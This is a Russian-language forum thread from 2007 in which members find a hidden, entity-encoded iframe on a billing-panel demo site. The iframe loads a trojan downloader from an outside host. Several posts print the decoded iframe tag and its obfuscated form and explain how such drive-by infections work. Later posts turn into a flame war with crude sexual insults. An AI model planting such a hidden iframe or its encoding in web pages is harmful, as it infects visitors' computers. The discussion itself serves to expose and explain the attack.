PDA

Просмотр полной версии : _Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец!

[Y.P.C.]yla
29.01.2007, 01:07
Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это :confused: :mad:
*****(22:33:43 28/01/2007)
Тему удалили как я понял и я его не увидел.
И передай урсуле, что она возможно уже чей-то бот
Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил.
*****(22:34:17 28/01/2007)
Это гаврила написал

И обьясни от куда ты нарыл
****** (23:07:35 28/01/2007)
На самом деле в раскодированном виде выглядит это так

<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>

Потом перекидывает сюда http://81.95.146.241/ss21mk2/index.php
Ах да
Вот письмо от дяди Жени

Здравствуйте.
1) На сайте обнаружен зловред (Trojan-Downloader.JS.Agent.bx)
2) На сайте были также недетектируемые нами зловреды - могут возникнуть проблемы.

Благодарим за оказанную помощь.
---------
С уважением, Юрий Несмачный
Вирусный аналитик
ЗАО "Лаборатория Касперского"

Petr
29.01.2007, 01:14
Вот это и называеца параноя.

Undernative
29.01.2007, 01:19
Мне отсюда инетересно чем он сделал декод....

[Y.P.C.]yla
29.01.2007, 01:19
Sandjuro
незнаю....незнаю..
Просто пусть мне предоставит факты!

Petr
29.01.2007, 01:31
YL@']Sandjuro
незнаю....незнаю..
Просто пусть мне предоставит факты!
У меня такое было очень часто, но я обезаписл себя отовсех и отовсюду, и теперь я свободен от всех.
просто день идет, а я все жив.

Ksander
29.01.2007, 01:34
а через пм или асю никак нельзя у него это узнать ? тему я удалю

Undernative
29.01.2007, 01:38
Ксан.не трогай тему.Нужен глаС народа

[Y.P.C.]yla
29.01.2007, 01:45
Итак обратившись в Лаб Касперского,вот что выдало:
Trojan-Downloader.JS.Agent.bx

Детектирование добавлено 11 дек 2006 01:09 MSK
Обновление выпущено 11 дек 2006 03:08 MSK
Поведение Trojan-Downloader, троянский загрузчик

У данной программы пока нет описания.

Поскольку многие программы являются незначительными модификациями своих предыдущих версий, вам могут помочь описания других версий той же программы — если они есть, то ссылки на них приведены сразу под заголовком страницы.

Чтож....теперь вопрос....от куда ты взял его?И ту переходную ссылку?

RemaerD
Спасибо...

Гаврила
29.01.2007, 01:46
YL@']Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это :confused: :mad:

Что именно тебя запарило???
И как попала моя переписка с Ремаёрдом тебе???
Скорее этот вопрос нужно задать Ремаёрду..
Я не собираюсь обьяснять чем делать декод, это знает каждый школьник.
а через пм или асю никак нельзя у него это узнать ? тему я удалю
Ну так я и общался с Ремаёрдом через пм.
Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился.
Урсула сбавь обороты.
Подслушивать (подглядывать) чужие разговоры неприлично.
p.s.
Не надо писать мне в пм.
Я не даю уроков кодирования ссылок =)

Undernative
29.01.2007, 01:55
ГАвря,не вижу ничего такого что нельзя выкладывать из нашего с тобой ПМ... Вобщем я остаюсь на своем мнении...

УРС ЧмогЕ

[Y.P.C.]yla
29.01.2007, 01:55
Что именно тебя запарило???
И как попала моя переписка с Ремаёрдом тебе???
Скорее этот вопрос нужно задать Ремаёрду..
Я не собираюсь обьяснять чем делать декод, это знает каждый школьник.
Солнце,да не волнуйся ты так!
Блин ну ты понимаешь....я незнаю как декод делается твоими методами :confused: туплю! :(
Может все таки обьясниш как ты его зделал..в результати чего ты такие космические даные получил?

Ну так я и общался с Ремаёрдом через пм.
Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился.
Урсула сбавь обороты.
Подслушивать (подглядывать) чужие разговоры неприлично.
p.s.
Не надо писать мне в пм.
Я не даю уроков кодирования ссылок =)
Обороты сам сбавляй,когда понадобится так сразу..ты будешь первый кто узнает+))
А в пм я тебе написала...ну чтоб не заснул+)

[Y.P.C.]yla
29.01.2007, 01:57
RemaerD чмоГ:-*

Гаврила
29.01.2007, 02:09
YL@']Солнце,да не волнуйся ты так!
Блин ну ты понимаешь....я незнаю как декод делается твоими методами :confused: туплю! :(
Может все таки обьясниш как ты его зделал..в результати чего ты такие космические даные получил?

Обороты сам сбавляй,когда понадобится так сразу..ты будешь первый кто узнает+))
А в пм я тебе написала...ну чтоб не заснул+)
Ладно, так и быть, научу тебя =)
http://ha.ckers.org/xss.html
Отмотаешь страницу вниз, вставишь код в графу HTML (with semicolons):
Нажмёш кнопку Decode под этой строкой.
Вверху увидишь читаемый текст.
Написал подробно, чтоб ты не спросила опять что-нибудь =) Ну на каую кнопку жать или типа того.
&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x72;&#x61;&#x66;&#x66;&#x6C;&#x6F;&#x61;&#x64;&#x73;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x6F;&#x75;&#x74;&#x2E;&#x70;&#x68;&#x70;&#x3F;&#x73;&#x5F;&#x69;&#x64;&#x3D;&#x32;
Как видишь, космического нет ничего =)
А вообще можно просто сохранить код в .html и открыть файл. Но мне казалось что ремаёрд имея такую репу должен знать об этом. Странно что он тебе не обьяснил это.
Ну вы тут полобыбзайтесь, почмокайтесь, а мне честно говоря не хочется обсуждать более это всё.
========
Ах, ну я понял, репы то у вас типа превед +10.
Тогда понятно =)

[Y.P.C.]yla
29.01.2007, 02:25
Ладно, так и быть, научу тебя =)
Написал подробно, чтоб ты не спросила опять что-нибудь =) Ну на каую кнопку жать или типа того.
Спасибо большое!+)я не понимаю с чего ты решил что это вирус....... ну выдало ссылку.....но не вимжу я ничего подозрительного
Как видишь, космического нет ничего =)
А вообще можно просто сохранить код в .html и открыть файл. Но мне казалось что ремаёрд имея такую репу должен знать об этом. Странно что он тебе не обьяснил это.
Ну вы тут полобыбзайтесь, почмокайтесь, а мне честно говоря не хочется обсуждать более это всё.
Я ремаёрд-а такими вопросами не гружу,так как успеваю итак достать ими :D
========
Ах, ну я понял, репы то у вас типа превед +10.
Тогда понятно =)
нет....+20 :p

[Y.P.C.]yla
29.01.2007, 03:03
Короче Гаврила...все эти кода и ссылки да ..замечательно...просто отлично!
Но все же вопрос остается....а фактов так и нет....хмм...каким же макаром ты определил и подумал что там вирус...которого нет?
бред какойто!вернее не вирус...а троян..

Дрэгги
29.01.2007, 03:18
Мда...я читал но даже не понял о чем тут речь..жаль у меня не так много времени сидеть на ачате...может тогда бы и смог понять о чем речь в этой теме.

Дрэгги
29.01.2007, 03:20
Насколько я понял урсула прошла по какой-то вредной ссылке и ее комп превратился в бота...а Гаврила эту ссылку раскодировал полностью? Как сложен этот мир...

[Y.P.C.]yla
29.01.2007, 03:25
Дрэгги
Просто я давала ссылку на демо-версию билинг-панели...тогда нужны были програмеры..и для нагладного примера дала ссылку на сайт!Гаврила сказал мол там Трояны...и т.д и т.п.
Я смотрела ифреймы и основной код....ничего там нету подозрительного!Там был обычный ифрейм с загрузчиком..он утверждает,что там трояны....но их там нету....=\
я сама ниче не понимаю...из того,что он говорит!

censored!
29.01.2007, 03:31
Там был обычный ифрейм с загрузчиком
Фига се. Обычный ифрейм с загрузчиком =))))

Звучит как - да подумаешь, тебе троян установился. Делов то! =))))
...
p.s. участникам темы читать что такое довнлоадер и нафига его вообще используют (для чего)

[Y.P.C.]yla
29.01.2007, 03:32
Насколько я понял урсула прошла по какой-то вредной ссылке и ее комп превратился в бота...а Гаврила эту ссылку раскодировал полностью? Как сложен этот мир...
Да нет...
мой комп не превратился в бота!это ИМХо
и зловредной ссылки тоже не было!
пЫсЫ:я боюсь если выложу кода...то будут возражения...мол вирусы вылаживаю!
Гаврила как раз утверждает что что ботов эта херь собирала для доссов

censored!
29.01.2007, 03:35
мой комп не превратился в бота!это ИМХо
Откуда такая уверенность?

Просто - собирала ботов. Возможно для доса, может еще для чего.

я боюсь если выложу кода...то будут возражения...мол вирусы вылаживаю
Скинь в ПМ.

Просто с Гаврилой я по ПМ много общался и всякую хреновину он гнать уж точно не будет.

[Y.P.C.]yla
29.01.2007, 03:38
блин ну не прально выразилась значит.
там файл ....там есть ссылка на скачивание архива этой билинг панели(демо-версии)

[Y.P.C.]yla
29.01.2007, 03:40
censored!
ок.щас в пм пришлю....а то чесно говоря я уже запуталась!=\

censored!
29.01.2007, 03:40
блин ну не прально выразилась значит
Да по теме вообще не поймешь что за кипишь. =)

Закинь ссылку в ПМ - я завтра посмотрю чего там.

[Y.P.C.]yla
29.01.2007, 03:56
censored!
Там такое пм-ище......токо не пугайся!Я там все выписала...чтоб было тебе понятнее!
И прочти все!!

Дрэгги
29.01.2007, 04:18
Я смотрела ифреймы и основной код....ничего там нету подозрительного!Там был обычный ифрейм с загрузчиком..

А что это такое? Frame - это вроде как рамка на английском...а как ты вообще можешь по ссылке определить что она ведет на загрузку трояна?

Просто я давала ссылку на демо-версию билинг-панели...тогда нужны были програмеры..и для нагладного примера дала ссылку на сайт!

А откуда это все у тебя? Тебе нужны программеры? :confused: :confused: :confused: :confused:

blaga
29.01.2007, 04:24
ифрейм открывает удаленную страницу с которой пытается загрузить тебе троян и запустить его. Если ты шаришся в инете с дырявым ослом, тогда есть шансы что тебе этот троян закинут и хз что потом с тобой будет. Лучше не будет точно. Вот и все.

[Y.P.C.]yla
29.01.2007, 04:30
А откуда это все у тебя? Тебе нужны программеры? :confused: :confused: :confused: :confused:
Нужен был програмер который бы создал билинг-панель для ZeosHost-а. Я дала пример этой панеле по ссылке ******. там на странице была демо версия админки и для пользователей,которую можно было собствено и глянуть!На сайте ****.pp в ифрейме висит загрузка.....там тот архив закодирован в зенде и работает только на одном хостинге.там есть ссылка на скачивание архива этой панели, (но на другом сервере её не установишь, так как файлы закодированы зендом.)
Гаврила говорил что не стоит заходить и т.д и т.п....

Но там ничего...никаких троянов....ботов...и прочего не было!!!
Я смотрела и код самой страницы и за ифрейм смотрела.все было нормал.

вот и архив этой панели, в нём есть файл типа header.inc.php, как я понимаю в нём прописывается сервер.
http://******xpanel.rar

Короче хелп ми.....крыша скоро окончательно уедет!!я разбиралась...и смотрела уже по 100 раз...ну не понимаю....ну нету там ниче :confused:

[Y.P.C.]yla
29.01.2007, 04:32
ифрейм открывает удаленную страницу с которой пытается загрузить тебе троян и запустить его. Если ты шаришся в инете с дырявым ослом, тогда есть шансы что тебе этот троян закинут и хз что потом с тобой будет. Лучше не будет точно. Вот и все.
:confused: :confused:
......все....крыша уехала и мозги тоже!!АААА!!!
щас от переизбытка инфы и замешательств взрыв будет!!!!

blaga
29.01.2007, 04:34
Так, что конкретно не понятно? Так твоя крыша далеко не уедет....

[Y.P.C.]yla
29.01.2007, 04:39
Так, что конкретно не понятно?
А конкретно мне не понятно....про трояна...боты про которые Гаврил говорил!
Лично для меня ничего не свидетельствует о том что _ссылка небезопасная_ "что она возможно уже чей-то бот =)
Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил."(с)Гаврила
:confused: :confused: :confused:

Дрэгги
29.01.2007, 04:40
......все....крыша уехала и мозги тоже!!АААА!!!
щас от переизбытка инфы и замешательств взрыв будет!!!!

как раз в том что сказал blaga я все понял. Осел - это браузер IE.

А вот читая твой пост у меня реально крыша едет так как я в таких сложных вещах не разбираюсь..

создал билинг-панель для ZeosHost-а.

???

там тот архив закодирован в зенде и работает только на одном хостинге.там есть ссылка на скачивание архива этой панели, (но на другом сервере её не установишь, так как файлы закодированы зендом.)

????????????????

А тут у меня уже из глаз звездочки посыпались от обилия информации.

blaga
29.01.2007, 04:42
Через эту ссылку грузят троянов. Если ты подцепила этого трояна то ты можеш стать чьим нибудь ботом. Например для ддоса. Еще раз через эту ссылку грузят троянов. Ясно? Как они это работает это уже другой вопрос.

blaga
29.01.2007, 04:45
2Дрэгги, закодированы зендом - значит что скрипт не запустится абы где. Только на одном серваке. А ей нужно что бы он запускался везде. Для этого нужно зенд расшифровать. Чего вы все непонятливые такие.

Дрэгги
29.01.2007, 04:45
а что значит файлы и архив закодированы зендом??? Да и слова Zeoshost и билинг-панель для меня мало что говорят...

Если ты подцепила этого трояна то ты можеш стать чьим нибудь ботом.

А антивирь типа нод32 от этого не помогает разве?

Дрэгги
29.01.2007, 04:47
а все понял про зенд...а про зеосхост и билинг панель еще не дошло:)

[Y.P.C.]yla
29.01.2007, 04:47
blaga
Через какую именно ссылку грузят трояна??

Ну не может этого быть!!!Ведь там ссылка была для загрузки демо-версии самой панели!!!А не трояна!
Или я туплю...или незнаю....=\

[Y.P.C.]yla
29.01.2007, 04:49
Дрэгги
зеосхост - это __ http://zeoshost.ru/ =)))))

blaga
29.01.2007, 04:49
<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME> вот через этот ифрейм и грузится троян. Твоя ссылка на скачку тут ни при чем.

[Y.P.C.]yla
29.01.2007, 04:55
blaga
Ну так!!Не было ведь этой ссылки!!Этого ифрейма!! ___*разум начал прояснятся*___
Было вот:
<IFRAME src="&#x68;&#x74........и т.д и т.п(куча знаков)))" width=5 height=5 style="display:none"></IFRAME>

[Y.P.C.]yla
29.01.2007, 04:58
блин...все.....поняла...надо эти знаки декодировать...вот и будет...

A110ut
29.01.2007, 04:59
однако.. тема СантыБарбары раскрыта...

[Y.P.C.]yla
29.01.2007, 05:00
все правильно...через декод и получается:
_<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>_

твою.....мать....

blaga
29.01.2007, 05:00
вот эта куча знаков есть HTML эквиваленты англицким буквам. Чтобы их посмотреть создай такую вот хтмл страницу.

&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;
&#x74;&#x72;&#x61;&#x66;&#x66;&#x6C;&#x6F;
&#x61;&#x64;&#x73;&#x2E;&#x63;&#x6F;&#x6D;
&#x2F;&#x6F;&#x75;&#x74;&#x2E;&#x70;&#x68;
&#x70;&#x3F;&#x73;&#x5F;&#x69;&#x64;&#x3D;
&#x32;

для этого введи этот текст в блокнот и сохрани как html страницу. затем открой через браузер и ты увидиш http://traffloads.com/out.php?s_id=2. Все, я ухожу наверно и без меня тебе тут помогут. Если нет стукнишь потом в аську и я расскажу. 445593

[Y.P.C.]yla
29.01.2007, 05:03
blaga
Так это если только загрузить это....тогда?
От того, что я зашла на глав.страницу сайта...где предоставлена скачка на демку....ниче не будет?
про себя: хотя это на глав.странице и находится....

Блин!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Чер !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[Y.P.C.]yla
29.01.2007, 05:07
blaga
отредактируй пост...плиз=\ итак все плывет....О_о

Блин....а че ж делать?!!!!!!!!с этим ифреймом.....=\\\\\

Дрэгги
29.01.2007, 05:15
Пора спать? Блин мне бы тоже спать..но я письмецо набираю...работа такая у меня пока...

[Y.P.C.]yla
29.01.2007, 05:21
ДрэГ,я плакать=(((
а что это ты на ночь глядя письма набираешь?О_о

Кхем кхем......
Гаврила...я признаю свою ошибку!!!Ну не такая я умная блин....ну не знала я чесс слово!!!Я это не специально!!Так как мне эту ссылку на демку провереные чел. дал я просто напрочь отказывалась верить в это!!!=\
Да...я была не права....сорри....

-=lebed=-
29.01.2007, 11:06
Ну наконец-то Урсула разобралась...
Подытожим для тех кто в танке:
Любая страничка в интернете может содержать тэг IFRAME (например неотображаемый, размером 0x0 пикселей). В IFRAME загружается любая страница, как правило в этих случаях она вредоносная-использующая уязвимости браузеров, в большинстве случаев осла (IE). Юзверь заходит на основную страницу, а на ней есть тэг IFRAME (URL в нём, чтоб не бросался в глаза - закодирован) браузер юзверя обрабатывает основной код html и вредоносный код по сслыке в IFRAME и, в случае наличия уязвимости в браузере, а также других благопрятных условиях (старые базы антивиря, ненастроенный фаер) получает себе на компьютер трояна (любой вредоносный файл), после его скачивания системой, ему передаётся управление на запуск. Эксплуатация уязвимости->загрузка вредоносного кода->передача ему управления= +1 компьютер зомби в интернете.

P.S. Мдя, что только ей сразу не смогли всё толком объяснить, вот этого я не понял, кстати осла можно проверить на три извесные баги, пройдя по ссылке у меня в подписи...

bobob
29.01.2007, 11:08
YL@']RemaerD чмоГ:-*
заебали, оба, сосвоими любовями и чмога, чмы :D

Undernative
29.01.2007, 12:39
заебали, оба, сосвоими любовями и чмога, чмы :D
Ты вообще тут откуда нарисовался ?

Rebz
29.01.2007, 12:44
т-с-с-с-с!
мы все под колпаком!

[Y.P.C.]yla
29.01.2007, 13:42
Ну наконец-то Урсула разобралась...
Подытожим для тех кто в танке:
Любая страничка в интернете может содержать тэг IFRAME (например неотображаемый, размером 0x0 пикселей). В IFRAME загружается любая страница, как правило в этих случаях она вредоносная-использующая уязвимости браузеров, в большинстве случаев осла (IE). Юзверь заходит на основную страницу, а на ней есть тэг IFRAME (URL в нём, чтоб не бросался в глаза - закодирован) браузер юзверя обрабатывает основной код html и вредоносный код по сслыке в IFRAME и, в случае наличия уязвимости в браузере, а также других благопрятных условиях (старые базы антивиря, ненастроенный фаер) получает себе на компьютер трояна (любой вредоносный файл), после его скачивания системой, ему передаётся управление на запуск. Эксплуатация уязвимости->загрузка вредоносного кода->передача ему управления= +1 компьютер зомби в интернете.

P.S. Мдя, что только ей сразу не смогли всё толком объяснить, вот этого я не понял, кстати осла можно проверить на три извесные баги, пройдя по ссылке у меня в подписи...
Вот именно,что наконецто!!Сама рада как незнаю кто!!Я думала у меня уже крыша уедет далеко и надолго!! :D
Спс!Что еще розобьяснял *записала себе* :)
Итак...значит если я не закачала...то мне ничего не грозит...и если я с Нетскейпа заходила,а не с ИЕ?я правильно поняла?

Rebz
29.01.2007, 13:45
[YPC]YL@, пользуйся FireFox & Opera и не будет проблем.

[Y.P.C.]yla
29.01.2007, 13:53
[YPC]YL@, пользуйся FireFox & Opera и не будет проблем.
Слушаюсь товарисч генерал!!*отдала честь* :D

пЫсЫ: короче надо менять название темы на "Просветление [YPC]YL@" :D ппц!!прям не верится,что дошло!! :)

Rebz
29.01.2007, 13:55
*отдала честь*
гм.. мне ваша честь не нужна :))

bobob
29.01.2007, 14:00
RemaerD'у отдаш )))) в койке если недопоняла! бругага

извените за афтоп

[Y.P.C.]yla
29.01.2007, 14:03
Rebz
Ну дык уважуха типа...ну ладно...*убрала*=))

bobob
Больной совсем?Лечится не пробывал?

bobob
29.01.2007, 14:05
совсем, не пробывал

m0nzt3r
29.01.2007, 14:06
A110ut +100
Удивила фраза типа "ну а что там же не троян, а загрузчик"..ппц =)
Урсула ты чего не понимаешь?Ты дала линк людям, чтоб посмотрели.Гаврила зашел открыл код увидел закодированную строку.Раскодировал, получился код ифрейма, который ведет на скачку загрузчика.Как бы превадный ие эксплоит.И теперь тебя обвиняют, вполне по понятным причинам.Ну а если не знала, что там ифрейм и т.д., то ты не причем.

[Y.P.C.]yla
29.01.2007, 14:26
Урсула ты чего не понимаешь?Ты дала линк людям, чтоб посмотрели.Гаврила зашел открыл код увидел закодированную строку.Раскодировал, получился код ифрейма, который ведет на скачку загрузчика.Как бы превадный ие эксплоит.И теперь тебя обвиняют, вполне по понятным причинам.Ну а если не знала, что там ифрейм и т.д., то ты не причем.
Я уже все поняла!Я просто тогда не понимала....от куда он те ссылки с ифрейма взял.. :confused:
я просто на тот момент так как мне хостер и сказал, что там в архивах типа сам сервер и демка админки...
Но чесслово я не знала об этом..я смотрела страницу....ее код...ифрейм...ну не знала я о том что этот код ифрейма надо декодировать,как это зделал Гаврила...
Блин ну не хотела я....тем более на Ачат такое подсовывать!
Терь я эти ифреймы до конца жизни запомню! :D

пЫсЫ: спс,что хоть не устали мне обьяснять и все таки обьяснили...а не послали куда подальше с этими ифреймами! :D :D

bobob
А жаль...а ты попробуй может поможет! ;)

[Y.P.C.]yla
29.01.2007, 22:40
Мдя хостеру повезло меньше чем мне...вернее мне повезло,а ему нет!
Он все таки скачал ифрейм и панель ту......и что прикол так это то, что сначала выскачила ошибка....после чего инет отрубился и комп начал перезагружатся, после чего вновь зайдя в инет,как не в чем не бывало работа....НО когда хостер хотел выйти с инета....он просто не вырубался....инет напрочь отказывался вырубатся О_о !!после чего сеанч закрылся на компе....и поменял пароли!Короче троян пошел налаживать дела в панели управления...шутки своеобразные!
Хостер это все предотовратил и вернул....седня короче систему переустонавливал и все диски прешлось форматировать......но самое страшное как по мне проблемы с Биос=\ оно засело какимто чудом там.....
воть так......=\
мне просто чудо повезло!!!+)

Ksander
29.01.2007, 22:52
ув.Пользователи, перед тем как ссылаться на какието ресурсы предварительно проверьте их на "вшивость" ;)

Undernative
29.01.2007, 22:57
bobob мжт она мне и отдаст,не только честь,не просто отдаст... А вот тебе советую выбирать выражение...Язык твой длин слишком,для миньета бы сгодился,да жаль вот ты его тут только используешь,разрабатывай разрабатывай
Я не виноват что тебе по сей день лучшая девушка правая рука и отборная порнушка.

Нясь =) (http://remaerd.by.ru/images/dogs.jpg)

[Y.P.C.]yla
29.01.2007, 22:59
Ksander
Даа....
Теперь только так и буду делать!!ппц!!

И что самое интересное, что этому хостеру...эти же которые выдавали демки с троянами раньше полностю предоставляли услуги ему.....а теперь Админ тот смылся....и услуги то платные.....короче сегодня прощолкали...что хостер его и засудить...ну на крайняк штрафануть может!

[Y.P.C.]yla
29.01.2007, 23:03
О_о О_о

RemaerD+))

Спокойствие ....только спокойствие...Римас держи ся в руках)не кепетись)

Constantine
29.01.2007, 23:13
мда... трои в базовой системе ввода\вывода информации- это серьезно =))\

[Y.P.C.]yla
29.01.2007, 23:24
Constantine
Не то слово!!Особенно когда ОНО натворило шороху везде где только можно....короче прописался временно в Биосе...подумаешь))))))))

podkashey
30.01.2007, 00:12
Как раз примерно 20 часов назад в ИРК зашел разговор о трояная, загрузчиках итд. Почитав его можно понять, что такое билдер, лоадер, криптор и другие вещи.... А то урсула как-то быстро разобралась в теме... Поэтому еще загадки... ;)
Читать можно всем, даже censored! и m0nst3r ;)

[Y.P.C.]yla
30.01.2007, 00:28
podkashey
разобралась быстро?О_о нееее...я бы не сказала,что быстро)

Petr
30.01.2007, 00:38
У меня есть подозрения что я в той теме всеже открывал ссылку
Ежели просто если даже я открыл то это фигня? мой комп протроянился бы еслебы я прогу установил?

Ksander
30.01.2007, 01:12
я тоже открыл, но нод и два фаера молчат + ниче подозрительного не происходит, да и не на осле я сижу =)

bobob
30.01.2007, 10:29
bobob мжт она мне и отдаст,не только честь,не просто отдаст... А вот тебе советую выбирать выражение...Язык твой длин слишком,для миньета бы сгодился,да жаль вот ты его тут только используешь,разрабатывай разрабатывай
Я не виноват что тебе по сей день лучшая девушка правая рука и отборная порнушка.

Нясь =) (http://remaerd.by.ru/images/dogs.jpg)
минет будеш делать своим гей-друзьям, а потом и урсуле

Undernative
30.01.2007, 13:47

СОрри,геев нет,да и не делаю м\полу.А урсуле мжт и сделаю,тя ебет ?

PS ждешь когда меня забанят ? думаешь я боюсь говорить матом ? да пусть меня банят,токо почитай правила форума,девочка.

bobob
30.01.2007, 13:49
чувак =) мне тебя жалко ....
ты такой тупой! =)

Undernative
30.01.2007, 13:52
не прошло и 10 мин ...как на гавно свежее прилетел.

Undernative
30.01.2007, 13:52
чувак =) мне тебя жалко ....
ты такой тупой! =)
Не суди и не судимым будешь (c)

bobob
30.01.2007, 14:06
тебе не обязательно отвечать на все мои реплики, особенно когда это не вопрос

podkashey
30.01.2007, 22:19
гыггыы.... Давайте парни, раз на раз онлайн... гыггы... ИМХО пока не в пользу RemaerD, хотя хз как пойдет дальше... гыгыыгыг
П.С. Тема во флейме, можно писать много чего... гыгыы... Это я к модерам...

Ksander
30.01.2007, 22:24
гыггыы.... Давайте парни, раз на раз онлайн... гыггы... ИМХО пока не в пользу RemaerD, хотя хз как пойдет дальше... гыгыыгыг

Превед Регина , гыгы-гыгы-гыгы =)

Connor
30.01.2007, 22:41
От темы отклонились,боба в бан! клоун нах,хули на Риму наижаеш?Ты на себя посмотри тупой,че ты пенишся всегда.

Undernative
31.01.2007, 00:19

Даж не собираюсь че то отвечать....Дураков на свете много как он.Мне насрать где тема находиться, правила форума везде равны.... Впринципе мне насрать .Просто я не считаю нормальным начинать гон на человека без явных причин,при чем паблик,не относящийся к вам. Я в чем то не прав ? хотя лучше молчать,начнеться снова куча флейма.
Как шафки,не как бабки у подъездов.Вам дай повод мелкий,раздуете так что от сегодня до завтра.....

Молчать правильнее всего.

Petr
31.01.2007, 00:51
RemaerD
Далан не злись ;)
Когда читал твои посты на этом форуме не мог подумать что увижу тебя в агресии ;)

nc.STRIEM
31.01.2007, 01:12
я одного не могу понять куда модеры смотрят???
Закрывайте тему! у кого чет не решено, есть ПМ и ICQ а и еще есть real life!
>>>> бобо чемто не доволен пиши RemaerD в приват
>>>>RemaerD не обращай внимание на эту охинею.

podkashey
31.01.2007, 01:28
Закрывайте тему! у кого чет не решено, есть ПМ и ICQ а и еще есть real life!
Реал ИМХО бред, я срался с некоторыми, до реала никогда не доходило, а вообще по этой теме 3.14здатая статья в ксакепе последнем была про инет-тролей... Хотя ИМХО здесь нету таких профи... ггыгы... Бобоб просто глумится и некоторые неокрепшие мозги ведутся на это... гыггы
RemaerD, чмак тебя за то, что Региной назвал меня - хуле, может денег столько же поднимать буду.... гыггыы.... Удачи тебе, шуткуй еще...
Модеры, хорош, не закрывайте тему - пусть люди поглумятся, раздел флуда ИМХО для этого и нужен, ведь кто сюда заходит, для этого и заходят, чтобы говна разного почитать и ничего нового не узнать!!!!.... гыгыгы

Undernative
31.01.2007, 11:35
RemaerD, чмак тебя за то, что Региной назвал меня - хуле, может денег столько же поднимать буду.... гыггыы.... Удачи тебе, шуткуй еще...

ОЧепятка :) Назвал тя Ксан а не я
:D

bobob
31.01.2007, 16:40
podkashey, шариш чувак, видь шириш же =) респект

bobob
31.01.2007, 16:44
=) о боже-боже, я и не заметил и не успел проржатся:

....А урсуле мжт и сделаю,тя ебет ?...

:D

мужчинка, сколько вам лет? знаете ли что минет - это письку в ротик!? :o